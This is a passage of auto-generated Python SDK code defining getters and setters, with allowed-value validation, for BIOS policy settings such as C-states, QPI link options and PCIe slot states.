"Invalid value for `os_boot_watchdog_timer_timeout` ({0}), must be one of {1}"
.format(os_boot_watchdog_timer_timeout, allowed_values)
)
self._os_boot_watchdog_timer_timeout = os_boot_watchdog_timer_timeout
@property
def out_of_band_mgmt_port(self):
"""
Gets the out_of_band_mgmt_port of this BiosPolicy.
BIOS Token for setting Out-of-Band Mgmt Port configuration
:return: The out_of_band_mgmt_port of this BiosPolicy.
:rtype: str
"""
return self._out_of_band_mgmt_port
@out_of_band_mgmt_port.setter
def out_of_band_mgmt_port(self, out_of_band_mgmt_port):
"""
Sets the out_of_band_mgmt_port of this BiosPolicy.
BIOS Token for setting Out-of-Band Mgmt Port configuration
:param out_of_band_mgmt_port: The out_of_band_mgmt_port of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if out_of_band_mgmt_port not in allowed_values:
raise ValueError(
"Invalid value for `out_of_band_mgmt_port` ({0}), must be one of {1}"
.format(out_of_band_mgmt_port, allowed_values)
)
self._out_of_band_mgmt_port = out_of_band_mgmt_port
@property
def package_cstate_limit(self):
"""
Gets the package_cstate_limit of this BiosPolicy.
BIOS Token for setting Package C State Limit configuration
:return: The package_cstate_limit of this BiosPolicy.
:rtype: str
"""
return self._package_cstate_limit
@package_cstate_limit.setter
def package_cstate_limit(self, package_cstate_limit):
"""
Sets the package_cstate_limit of this BiosPolicy.
BIOS Token for setting Package C State Limit configuration
:param package_cstate_limit: The package_cstate_limit of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "C0 C1 State", "C0/C1", "C2", "C6 Non Retention", "C6 Retention", "No Limit"]
if package_cstate_limit not in allowed_values:
raise ValueError(
"Invalid value for `package_cstate_limit` ({0}), must be one of {1}"
.format(package_cstate_limit, allowed_values)
)
self._package_cstate_limit = package_cstate_limit
@property
def patrol_scrub(self):
"""
Gets the patrol_scrub of this BiosPolicy.
BIOS Token for setting Patrol Scrub configuration
:return: The patrol_scrub of this BiosPolicy.
:rtype: str
"""
return self._patrol_scrub
@patrol_scrub.setter
def patrol_scrub(self, patrol_scrub):
"""
Sets the patrol_scrub of this BiosPolicy.
BIOS Token for setting Patrol Scrub configuration
:param patrol_scrub: The patrol_scrub of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if patrol_scrub not in allowed_values:
raise ValueError(
"Invalid value for `patrol_scrub` ({0}), must be one of {1}"
.format(patrol_scrub, allowed_values)
)
self._patrol_scrub = patrol_scrub
@property
def patrol_scrub_duration(self):
"""
Gets the patrol_scrub_duration of this BiosPolicy.
BIOS Token for setting Patrol Scrub Interval configuration
:return: The patrol_scrub_duration of this BiosPolicy.
:rtype: str
"""
return self._patrol_scrub_duration
@patrol_scrub_duration.setter
def patrol_scrub_duration(self, patrol_scrub_duration):
"""
Sets the patrol_scrub_duration of this BiosPolicy.
BIOS Token for setting Patrol Scrub Interval configuration
:param patrol_scrub_duration: The patrol_scrub_duration of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if patrol_scrub_duration not in allowed_values:
raise ValueError(
"Invalid value for `patrol_scrub_duration` ({0}), must be one of {1}"
.format(patrol_scrub_duration, allowed_values)
)
self._patrol_scrub_duration = patrol_scrub_duration
@property
def pc_ie_ssd_hot_plug_support(self):
"""
Gets the pc_ie_ssd_hot_plug_support of this BiosPolicy.
BIOS Token for setting NVMe SSD Hot-Plug Support configuration
:return: The pc_ie_ssd_hot_plug_support of this BiosPolicy.
:rtype: str
"""
return self._pc_ie_ssd_hot_plug_support
@pc_ie_ssd_hot_plug_support.setter
def pc_ie_ssd_hot_plug_support(self, pc_ie_ssd_hot_plug_support):
"""
Sets the pc_ie_ssd_hot_plug_support of this BiosPolicy.
BIOS Token for setting NVMe SSD Hot-Plug Support configuration
:param pc_ie_ssd_hot_plug_support: The pc_ie_ssd_hot_plug_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if pc_ie_ssd_hot_plug_support not in allowed_values:
raise ValueError(
"Invalid value for `pc_ie_ssd_hot_plug_support` ({0}), must be one of {1}"
.format(pc_ie_ssd_hot_plug_support, allowed_values)
)
self._pc_ie_ssd_hot_plug_support = pc_ie_ssd_hot_plug_support
@property
def pch_usb30mode(self):
"""
Gets the pch_usb30mode of this BiosPolicy.
BIOS Token for setting xHCI Mode configuration
:return: The pch_usb30mode of this BiosPolicy.
:rtype: str
"""
return self._pch_usb30mode
@pch_usb30mode.setter
def pch_usb30mode(self, pch_usb30mode):
"""
Sets the pch_usb30mode of this BiosPolicy.
BIOS Token for setting xHCI Mode configuration
:param pch_usb30mode: The pch_usb30mode of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if pch_usb30mode not in allowed_values:
raise ValueError(
"Invalid value for `pch_usb30mode` ({0}), must be one of {1}"
.format(pch_usb30mode, allowed_values)
)
self._pch_usb30mode = pch_usb30mode
@property
def pci_option_ro_ms(self):
"""
Gets the pci_option_ro_ms of this BiosPolicy.
BIOS Token for setting All PCIe Slots OptionROM configuration
:return: The pci_option_ro_ms of this BiosPolicy.
:rtype: str
"""
return self._pci_option_ro_ms
@pci_option_ro_ms.setter
def pci_option_ro_ms(self, pci_option_ro_ms):
"""
Sets the pci_option_ro_ms of this BiosPolicy.
BIOS Token for setting All PCIe Slots OptionROM configuration
:param pci_option_ro_ms: The pci_option_ro_ms of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if pci_option_ro_ms not in allowed_values:
raise ValueError(
"Invalid value for `pci_option_ro_ms` ({0}), must be one of {1}"
.format(pci_option_ro_ms, allowed_values)
)
self._pci_option_ro_ms = pci_option_ro_ms
@property
def pci_rom_clp(self):
"""
Gets the pci_rom_clp of this BiosPolicy.
BIOS Token for setting PCI ROM CLP configuration
:return: The pci_rom_clp of this BiosPolicy.
:rtype: str
"""
return self._pci_rom_clp
@pci_rom_clp.setter
def pci_rom_clp(self, pci_rom_clp):
"""
Sets the pci_rom_clp of this BiosPolicy.
BIOS Token for setting PCI ROM CLP configuration
:param pci_rom_clp: The pci_rom_clp of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if pci_rom_clp not in allowed_values:
raise ValueError(
"Invalid value for `pci_rom_clp` ({0}), must be one of {1}"
.format(pci_rom_clp, allowed_values)
)
self._pci_rom_clp = pci_rom_clp
@property
def pop_support(self):
"""
Gets the pop_support of this BiosPolicy.
BIOS Token for setting Power ON Password configuration
:return: The pop_support of this BiosPolicy.
:rtype: str
"""
return self._pop_support
@pop_support.setter
def pop_support(self, pop_support):
"""
Sets the pop_support of this BiosPolicy.
BIOS Token for setting Power ON Password configuration
:param pop_support: The pop_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if pop_support not in allowed_values:
raise ValueError(
"Invalid value for `pop_support` ({0}), must be one of {1}"
.format(pop_support, allowed_values)
)
self._pop_support = pop_support
@property
def post_error_pause(self):
"""
Gets the post_error_pause of this BiosPolicy.
BIOS Token for setting POST Error Pause configuration
:return: The post_error_pause of this BiosPolicy.
:rtype: str
"""
return self._post_error_pause
@post_error_pause.setter
def post_error_pause(self, post_error_pause):
"""
Sets the post_error_pause of this BiosPolicy.
BIOS Token for setting POST Error Pause configuration
:param post_error_pause: The post_error_pause of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if post_error_pause not in allowed_values:
raise ValueError(
"Invalid value for `post_error_pause` ({0}), must be one of {1}"
.format(post_error_pause, allowed_values)
)
self._post_error_pause = post_error_pause
@property
def processor_c1e(self):
"""
Gets the processor_c1e of this BiosPolicy.
BIOS Token for setting Processor C1E configuration
:return: The processor_c1e of this BiosPolicy.
:rtype: str
"""
return self._processor_c1e
@processor_c1e.setter
def processor_c1e(self, processor_c1e):
"""
Sets the processor_c1e of this BiosPolicy.
BIOS Token for setting Processor C1E configuration
:param processor_c1e: The processor_c1e of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if processor_c1e not in allowed_values:
raise ValueError(
"Invalid value for `processor_c1e` ({0}), must be one of {1}"
.format(processor_c1e, allowed_values)
)
self._processor_c1e = processor_c1e
@property
def processor_c3report(self):
"""
Gets the processor_c3report of this BiosPolicy.
BIOS Token for setting Processor C3 Report configuration
:return: The processor_c3report of this BiosPolicy.
:rtype: str
"""
return self._processor_c3report
@processor_c3report.setter
def processor_c3report(self, processor_c3report):
"""
Sets the processor_c3report of this BiosPolicy.
BIOS Token for setting Processor C3 Report configuration
:param processor_c3report: The processor_c3report of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if processor_c3report not in allowed_values:
raise ValueError(
"Invalid value for `processor_c3report` ({0}), must be one of {1}"
.format(processor_c3report, allowed_values)
)
self._processor_c3report = processor_c3report
@property
def processor_c6report(self):
"""
Gets the processor_c6report of this BiosPolicy.
BIOS Token for setting Processor C6 Report configuration
:return: The processor_c6report of this BiosPolicy.
:rtype: str
"""
return self._processor_c6report
@processor_c6report.setter
def processor_c6report(self, processor_c6report):
"""
Sets the processor_c6report of this BiosPolicy.
BIOS Token for setting Processor C6 Report configuration
:param processor_c6report: The processor_c6report of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if processor_c6report not in allowed_values:
raise ValueError(
"Invalid value for `processor_c6report` ({0}), must be one of {1}"
.format(processor_c6report, allowed_values)
)
self._processor_c6report = processor_c6report
@property
def processor_cstate(self):
"""
Gets the processor_cstate of this BiosPolicy.
BIOS Token for setting CPU C State configuration
:return: The processor_cstate of this BiosPolicy.
:rtype: str
"""
return self._processor_cstate
@processor_cstate.setter
def processor_cstate(self, processor_cstate):
"""
Sets the processor_cstate of this BiosPolicy.
BIOS Token for setting CPU C State configuration
:param processor_cstate: The processor_cstate of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if processor_cstate not in allowed_values:
raise ValueError(
"Invalid value for `processor_cstate` ({0}), must be one of {1}"
.format(processor_cstate, allowed_values)
)
self._processor_cstate = processor_cstate
@property
def profiles(self):
"""
Gets the profiles of this BiosPolicy.
Relationship to the profile objects
:return: The profiles of this BiosPolicy.
:rtype: list[PolicyAbstractConfigProfileRef]
"""
return self._profiles
@profiles.setter
def profiles(self, profiles):
"""
Sets the profiles of this BiosPolicy.
Relationship to the profile objects
:param profiles: The profiles of this BiosPolicy.
:type: list[PolicyAbstractConfigProfileRef]
"""
self._profiles = profiles
@property
def psata(self):
"""
Gets the psata of this BiosPolicy.
BIOS Token for setting P-SATA mode configuration
:return: The psata of this BiosPolicy.
:rtype: str
"""
return self._psata
@psata.setter
def psata(self, psata):
"""
Sets the psata of this BiosPolicy.
BIOS Token for setting P-SATA mode configuration
:param psata: The psata of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "AHCI", "Disabled", "LSI SW RAID"]
if psata not in allowed_values:
raise ValueError(
"Invalid value for `psata` ({0}), must be one of {1}"
.format(psata, allowed_values)
)
self._psata = psata
@property
def pstate_coord_type(self):
"""
Gets the pstate_coord_type of this BiosPolicy.
BIOS Token for setting P-STATE Coordination configuration
:return: The pstate_coord_type of this BiosPolicy.
:rtype: str
"""
return self._pstate_coord_type
@pstate_coord_type.setter
def pstate_coord_type(self, pstate_coord_type):
"""
Sets the pstate_coord_type of this BiosPolicy.
BIOS Token for setting P-STATE Coordination configuration
:param pstate_coord_type: The pstate_coord_type of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "HW ALL", "SW ALL", "SW ANY"]
if pstate_coord_type not in allowed_values:
raise ValueError(
"Invalid value for `pstate_coord_type` ({0}), must be one of {1}"
.format(pstate_coord_type, allowed_values)
)
self._pstate_coord_type = pstate_coord_type
@property
def putty_key_pad(self):
"""
Gets the putty_key_pad of this BiosPolicy.
BIOS Token for setting Putty KeyPad configuration
:return: The putty_key_pad of this BiosPolicy.
:rtype: str
"""
return self._putty_key_pad
@putty_key_pad.setter
def putty_key_pad(self, putty_key_pad):
"""
Sets the putty_key_pad of this BiosPolicy.
BIOS Token for setting Putty KeyPad configuration
:param putty_key_pad: The putty_key_pad of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "ESCN", "LINUX", "SCO", "VT100", "VT400", "XTERMR6"]
if putty_key_pad not in allowed_values:
raise ValueError(
"Invalid value for `putty_key_pad` ({0}), must be one of {1}"
.format(putty_key_pad, allowed_values)
)
self._putty_key_pad = putty_key_pad
@property
def pwr_perf_tuning(self):
"""
Gets the pwr_perf_tuning of this BiosPolicy.
BIOS Token for setting Power Performance Tuning configuration
:return: The pwr_perf_tuning of this BiosPolicy.
:rtype: str
"""
return self._pwr_perf_tuning
@pwr_perf_tuning.setter
def pwr_perf_tuning(self, pwr_perf_tuning):
"""
Sets the pwr_perf_tuning of this BiosPolicy.
BIOS Token for setting Power Performance Tuning configuration
:param pwr_perf_tuning: The pwr_perf_tuning of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "bios", "os"]
if pwr_perf_tuning not in allowed_values:
raise ValueError(
"Invalid value for `pwr_perf_tuning` ({0}), must be one of {1}"
.format(pwr_perf_tuning, allowed_values)
)
self._pwr_perf_tuning = pwr_perf_tuning
@property
def qpi_link_frequency(self):
"""
Gets the qpi_link_frequency of this BiosPolicy.
BIOS Token for setting QPI Link Frequency Select configuration
:return: The qpi_link_frequency of this BiosPolicy.
:rtype: str
"""
return self._qpi_link_frequency
@qpi_link_frequency.setter
def qpi_link_frequency(self, qpi_link_frequency):
"""
Sets the qpi_link_frequency of this BiosPolicy.
BIOS Token for setting QPI Link Frequency Select configuration
:param qpi_link_frequency: The qpi_link_frequency of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "6.4-gt/s", "7.2-gt/s", "8.0-gt/s", "9.6-gt/s", "auto"]
if qpi_link_frequency not in allowed_values:
raise ValueError(
"Invalid value for `qpi_link_frequency` ({0}), must be one of {1}"
.format(qpi_link_frequency, allowed_values)
)
self._qpi_link_frequency = qpi_link_frequency
@property
def qpi_snoop_mode(self):
"""
Gets the qpi_snoop_mode of this BiosPolicy.
BIOS Token for setting QPI Snoop Mode configuration
:return: The qpi_snoop_mode of this BiosPolicy.
:rtype: str
"""
return self._qpi_snoop_mode
@qpi_snoop_mode.setter
def qpi_snoop_mode(self, qpi_snoop_mode):
"""
Sets the qpi_snoop_mode of this BiosPolicy.
BIOS Token for setting QPI Snoop Mode configuration
:param qpi_snoop_mode: The qpi_snoop_mode of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "auto", "cluster-on-die", "early-snoop", "home-directory-snoop", "home-directory-snoop-with-osb", "home-snoop"]
if qpi_snoop_mode not in allowed_values:
raise ValueError(
"Invalid value for `qpi_snoop_mode` ({0}), must be one of {1}"
.format(qpi_snoop_mode, allowed_values)
)
self._qpi_snoop_mode = qpi_snoop_mode
@property
def rank_inter_leave(self):
"""
Gets the rank_inter_leave of this BiosPolicy.
BIOS Token for setting Rank Interleaving configuration
:return: The rank_inter_leave of this BiosPolicy.
:rtype: str
"""
return self._rank_inter_leave
@rank_inter_leave.setter
def rank_inter_leave(self, rank_inter_leave):
"""
Sets the rank_inter_leave of this BiosPolicy.
BIOS Token for setting Rank Interleaving configuration
:param rank_inter_leave: The rank_inter_leave of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "1-way", "2-way", "4-way", "8-way", "auto"]
if rank_inter_leave not in allowed_values:
raise ValueError(
"Invalid value for `rank_inter_leave` ({0}), must be one of {1}"
.format(rank_inter_leave, allowed_values)
)
self._rank_inter_leave = rank_inter_leave
@property
def redirection_after_post(self):
"""
Gets the redirection_after_post of this BiosPolicy.
BIOS Token for setting Redirection After BIOS POST configuration
:return: The redirection_after_post of this BiosPolicy.
:rtype: str
"""
return self._redirection_after_post
@redirection_after_post.setter
def redirection_after_post(self, redirection_after_post):
"""
Sets the redirection_after_post of this BiosPolicy.
BIOS Token for setting Redirection After BIOS POST configuration
:param redirection_after_post: The redirection_after_post of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Always Enable", "Bootloader"]
if redirection_after_post not in allowed_values:
raise ValueError(
"Invalid value for `redirection_after_post` ({0}), must be one of {1}"
.format(redirection_after_post, allowed_values)
)
self._redirection_after_post = redirection_after_post
@property
def sata_mode_select(self):
"""
Gets the sata_mode_select of this BiosPolicy.
BIOS Token for setting SATA mode configuration
:return: The sata_mode_select of this BiosPolicy.
:rtype: str
"""
return self._sata_mode_select
@sata_mode_select.setter
def sata_mode_select(self, sata_mode_select):
"""
Sets the sata_mode_select of this BiosPolicy.
BIOS Token for setting SATA mode configuration
:param sata_mode_select: The sata_mode_select of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "AHCI", "Disabled", "LSI SW RAID"]
if sata_mode_select not in allowed_values:
raise ValueError(
"Invalid value for `sata_mode_select` ({0}), must be one of {1}"
.format(sata_mode_select, allowed_values)
)
self._sata_mode_select = sata_mode_select
@property
def select_memory_ras_configuration(self):
"""
Gets the select_memory_ras_configuration of this BiosPolicy.
BIOS Token for setting SelectMemory RAS configuration configuration
:return: The select_memory_ras_configuration of this BiosPolicy.
:rtype: str
"""
return self._select_memory_ras_configuration
@select_memory_ras_configuration.setter
def select_memory_ras_configuration(self, select_memory_ras_configuration):
"""
Sets the select_memory_ras_configuration of this BiosPolicy.
BIOS Token for setting SelectMemory RAS configuration configuration
:param select_memory_ras_configuration: The select_memory_ras_configuration of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "lockstep", "maximum-performance", "mirror-mode-1lm", "mirroring", "sparing"]
if select_memory_ras_configuration not in allowed_values:
raise ValueError(
"Invalid value for `select_memory_ras_configuration` ({0}), must be one of {1}"
.format(select_memory_ras_configuration, allowed_values)
)
self._select_memory_ras_configuration = select_memory_ras_configuration
@property
def serial_port_aenable(self):
"""
Gets the serial_port_aenable of this BiosPolicy.
BIOS Token for setting Serial A Enable configuration
:return: The serial_port_aenable of this BiosPolicy.
:rtype: str
"""
return self._serial_port_aenable
@serial_port_aenable.setter
def serial_port_aenable(self, serial_port_aenable):
"""
Sets the serial_port_aenable of this BiosPolicy.
BIOS Token for setting Serial A Enable configuration
:param serial_port_aenable: The serial_port_aenable of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if serial_port_aenable not in allowed_values:
raise ValueError(
"Invalid value for `serial_port_aenable` ({0}), must be one of {1}"
.format(serial_port_aenable, allowed_values)
)
self._serial_port_aenable = serial_port_aenable
@property
def single_pctl_enable(self):
"""
Gets the single_pctl_enable of this BiosPolicy.
BIOS Token for setting Single PCTL configuration
:return: The single_pctl_enable of this BiosPolicy.
:rtype: str
"""
return self._single_pctl_enable
@single_pctl_enable.setter
def single_pctl_enable(self, single_pctl_enable):
"""
Sets the single_pctl_enable of this BiosPolicy.
BIOS Token for setting Single PCTL configuration
:param single_pctl_enable: The single_pctl_enable of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "No", "Yes"]
if single_pctl_enable not in allowed_values:
raise ValueError(
"Invalid value for `single_pctl_enable` ({0}), must be one of {1}"
.format(single_pctl_enable, allowed_values)
)
self._single_pctl_enable = single_pctl_enable
@property
def slot10link_speed(self):
"""
Gets the slot10link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:10 Link Speed configuration
:return: The slot10link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot10link_speed
@slot10link_speed.setter
def slot10link_speed(self, slot10link_speed):
"""
Sets the slot10link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:10 Link Speed configuration
:param slot10link_speed: The slot10link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot10link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot10link_speed` ({0}), must be one of {1}"
.format(slot10link_speed, allowed_values)
)
self._slot10link_speed = slot10link_speed
@property
def slot10state(self):
"""
Gets the slot10state of this BiosPolicy.
BIOS Token for setting Slot 10 state configuration
:return: The slot10state of this BiosPolicy.
:rtype: str
"""
return self._slot10state
@slot10state.setter
def slot10state(self, slot10state):
"""
Sets the slot10state of this BiosPolicy.
BIOS Token for setting Slot 10 state configuration
:param slot10state: The slot10state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot10state not in allowed_values:
raise ValueError(
"Invalid value for `slot10state` ({0}), must be one of {1}"
.format(slot10state, allowed_values)
)
self._slot10state = slot10state
@property
def slot11link_speed(self):
"""
Gets the slot11link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:11 Link Speed configuration
:return: The slot11link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot11link_speed
@slot11link_speed.setter
def slot11link_speed(self, slot11link_speed):
"""
Sets the slot11link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:11 Link Speed configuration
:param slot11link_speed: The slot11link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot11link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot11link_speed` ({0}), must be one of {1}"
.format(slot11link_speed, allowed_values)
)
self._slot11link_speed = slot11link_speed
@property
def slot11state(self):
"""
Gets the slot11state of this BiosPolicy.
BIOS Token for setting Slot 11 state configuration
:return: The slot11state of this BiosPolicy.
:rtype: str
"""
return self._slot11state
@slot11state.setter
def slot11state(self, slot11state):
"""
Sets the slot11state of this BiosPolicy.
BIOS Token for setting Slot 11 state configuration
:param slot11state: The slot11state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot11state not in allowed_values:
raise ValueError(
"Invalid value for `slot11state` ({0}), must be one of {1}"
.format(slot11state, allowed_values)
)
self._slot11state = slot11state
@property
def slot12link_speed(self):
"""
Gets the slot12link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:12 Link Speed configuration
:return: The slot12link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot12link_speed
@slot12link_speed.setter
def slot12link_speed(self, slot12link_speed):
"""
Sets the slot12link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:12 Link Speed configuration
:param slot12link_speed: The slot12link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot12link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot12link_speed` ({0}), must be one of {1}"
.format(slot12link_speed, allowed_values)
)
self._slot12link_speed = slot12link_speed
@property
def slot12state(self):
"""
Gets the slot12state of this BiosPolicy.
BIOS Token for setting Slot 12 state configuration
:return: The slot12state of this BiosPolicy.
:rtype: str
"""
return self._slot12state
@slot12state.setter
def slot12state(self, slot12state):
"""
Sets the slot12state of this BiosPolicy.
BIOS Token for setting Slot 12 state configuration
:param slot12state: The slot12state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot12state not in allowed_values:
raise ValueError(
"Invalid value for `slot12state` ({0}), must be one of {1}"
.format(slot12state, allowed_values)
)
self._slot12state = slot12state
@property
def slot1link_speed(self):
"""
Gets the slot1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:1 Link Speed configuration
:return: The slot1link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot1link_speed
@slot1link_speed.setter
def slot1link_speed(self, slot1link_speed):
"""
Sets the slot1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:1 Link Speed configuration
:param slot1link_speed: The slot1link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot1link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot1link_speed` ({0}), must be one of {1}"
.format(slot1link_speed, allowed_values)
)
self._slot1link_speed = slot1link_speed
@property
def slot1state(self):
"""
Gets the slot1state of this BiosPolicy.
BIOS Token for setting Slot 1 state configuration
:return: The slot1state of this BiosPolicy.
:rtype: str
"""
return self._slot1state
@slot1state.setter
def slot1state(self, slot1state):
"""
Sets the slot1state of this BiosPolicy.
BIOS Token for setting Slot 1 state configuration
:param slot1state: The slot1state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot1state not in allowed_values:
raise ValueError(
"Invalid value for `slot1state` ({0}), must be one of {1}"
.format(slot1state, allowed_values)
)
self._slot1state = slot1state
@property
def slot2link_speed(self):
"""
Gets the slot2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:2 Link Speed configuration
:return: The slot2link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot2link_speed
@slot2link_speed.setter
def slot2link_speed(self, slot2link_speed):
"""
Sets the slot2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:2 Link Speed configuration
:param slot2link_speed: The slot2link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot2link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot2link_speed` ({0}), must be one of {1}"
.format(slot2link_speed, allowed_values)
)
self._slot2link_speed = slot2link_speed
@property
def slot2state(self):
"""
Gets the slot2state of this BiosPolicy.
BIOS Token for setting Slot 2 state configuration
:return: The slot2state of this BiosPolicy.
:rtype: str
"""
return self._slot2state
@slot2state.setter
def slot2state(self, slot2state):
"""
Sets the slot2state of this BiosPolicy.
BIOS Token for setting Slot 2 state configuration
:param slot2state: The slot2state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot2state not in allowed_values:
raise ValueError(
"Invalid value for `slot2state` ({0}), must be one of {1}"
.format(slot2state, allowed_values)
)
self._slot2state = slot2state
@property
def slot3link_speed(self):
"""
Gets the slot3link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:3 Link Speed configuration
:return: The slot3link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot3link_speed
@slot3link_speed.setter
def slot3link_speed(self, slot3link_speed):
"""
Sets the slot3link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:3 Link Speed configuration
:param slot3link_speed: The slot3link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot3link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot3link_speed` ({0}), must be one of {1}"
.format(slot3link_speed, allowed_values)
)
self._slot3link_speed = slot3link_speed
@property
def slot3state(self):
"""
Gets the slot3state of this BiosPolicy.
BIOS Token for setting Slot 3 state configuration
:return: The slot3state of this BiosPolicy.
:rtype: str
"""
return self._slot3state
@slot3state.setter
def slot3state(self, slot3state):
"""
Sets the slot3state of this BiosPolicy.
BIOS Token for setting Slot 3 state configuration
:param slot3state: The slot3state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot3state not in allowed_values:
raise ValueError(
"Invalid value for `slot3state` ({0}), must be one of {1}"
.format(slot3state, allowed_values)
)
self._slot3state = slot3state
@property
def slot4link_speed(self):
"""
Gets the slot4link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:4 Link Speed configuration
:return: The slot4link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot4link_speed
@slot4link_speed.setter
def slot4link_speed(self, slot4link_speed):
"""
Sets the slot4link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:4 Link Speed configuration
:param slot4link_speed: The slot4link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot4link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot4link_speed` ({0}), must be one of {1}"
.format(slot4link_speed, allowed_values)
)
self._slot4link_speed = slot4link_speed
@property
def slot4state(self):
"""
Gets the slot4state of this BiosPolicy.
BIOS Token for setting Slot 4 state configuration
:return: The slot4state of this BiosPolicy.
:rtype: str
"""
return self._slot4state
@slot4state.setter
def slot4state(self, slot4state):
"""
Sets the slot4state of this BiosPolicy.
BIOS Token for setting Slot 4 state configuration
:param slot4state: The slot4state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot4state not in allowed_values:
raise ValueError(
"Invalid value for `slot4state` ({0}), must be one of {1}"
.format(slot4state, allowed_values)
)
self._slot4state = slot4state
@property
def slot5link_speed(self):
"""
Gets the slot5link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:5 Link Speed configuration
:return: The slot5link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot5link_speed
@slot5link_speed.setter
def slot5link_speed(self, slot5link_speed):
"""
Sets the slot5link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:5 Link Speed configuration
:param slot5link_speed: The slot5link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot5link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot5link_speed` ({0}), must be one of {1}"
.format(slot5link_speed, allowed_values)
)
self._slot5link_speed = slot5link_speed
@property
def slot5state(self):
"""
Gets the slot5state of this BiosPolicy.
BIOS Token for setting Slot 5 state configuration
:return: The slot5state of this BiosPolicy.
:rtype: str
"""
return self._slot5state
@slot5state.setter
def slot5state(self, slot5state):
"""
Sets the slot5state of this BiosPolicy.
BIOS Token for setting Slot 5 state configuration
:param slot5state: The slot5state of this BiosPolicy.
